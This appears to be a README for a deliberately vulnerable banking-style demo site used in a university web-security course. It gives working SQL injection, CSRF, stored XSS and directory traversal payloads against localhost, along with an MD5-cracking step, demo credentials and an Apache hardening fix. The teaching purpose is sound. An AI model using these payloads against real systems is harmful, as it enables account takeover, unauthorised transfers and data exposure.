Base website security demo

• designed for students of KIV/WEB of University of West Bohemia

Presentation

Slides from presentation

Development

Installation

1. Install Docker
2. Install Docker Compose
3. Clone this repository git clone https://github.com/intraworlds/zcu-security-demo.git or download ZIP file

Run

1. run docker-compose up and you access the website

• app: http://localhost:8088/
• username: willis.ritchie@example.com
• password: richie
• adminer: http://localhost:8086/?server=mysql&username=admin&db=zcu_demo
• password: 1234

Note: It'll take a minute to build docker container - be patient.

Simulate attacks

SQL injection

• go to http://localhost:8088/?path=list&limit=50;update%20users%20set%20name=email,password=%27%242y%2410%24vXUP3XG34Nwezd8cEZm0XOLUN5jtDsF6tqpMg.PvFacpzKStHA2ze%27;
• notice added command update users set name=email,password='$2y$10$vXUP3XG34Nwezd8cEZm0XOLUN5jtDsF6tqpMg.PvFacpzKStHA2ze'
• refresh page
• observe that all users are named by its email and theirs password is 123
• so now you can access any account and transfer a money

CSRF

• goto http://localhost:8088/?path=create&receiver=1&amount=1&desc=❤️&submit=create
• observe that 1 IW coin was transfered to user #1 without your consent

XSS (with CSRF)

• goto http://localhost:8088/?path=create
• create new transaction with following description

❤️
<script>
fetch("/?path=create&receiver=1&amount=1&desc=❤️&submit=create");
</script>

• observe that now everybody who visits list of transactions will send a coin to user #1 without consent

Directory traversal

try following URLs

• http://localhost:8088/docker-compose.yml
• http://localhost:8088/config/app.env
• http://localhost:8088/dumps/zcu_demo.sql

Defense

Adjust apache configuration

# denied all files
<RequireAll>
    Require all denied
</RequireAll>

# whitelist only *.php and other files
<FilesMatch "((^$)|(^.+\.(php|css|map|js)$))">
    Require all granted
</FilesMatch>

Weak hash algorithm

try use hashcat

php scripts/crack_md5_hash.php 75b71aa6842e450f12aca00fdf54c51d

Docker tips

Show all running containers

docker-compose ps

See logs

docker-compose logs -f

Connect container

docker-compose exec apache bash -l

attacks

• Full list of attacks

XSS (Cross-site Scripting)

• OWASP XSS
• OWASP testing for XSS
• PHP triky: Cross Site Scripting (czech only)

HTTP Headers

• X-XSS-Protection
• Content-Security-Policy

SQL injection

• OWASP SQL injection
• Soom: SQL Injection (Full Paper) (czech only)
• PHP triky: Obrana proti SQL Injection (czech only)

CSFR (Cross-Site Request Forgery)

• OWASP CSFR
• Soom (czech only)
• PHP triky: Cross-Site Request Forgery (czech only)
• Co je Cross-Site Request Forgery a jak se mu bránit (czech only)

Path (Directory) Traversal

• OWASP Path Traversal

Others

• Self tweeting tweet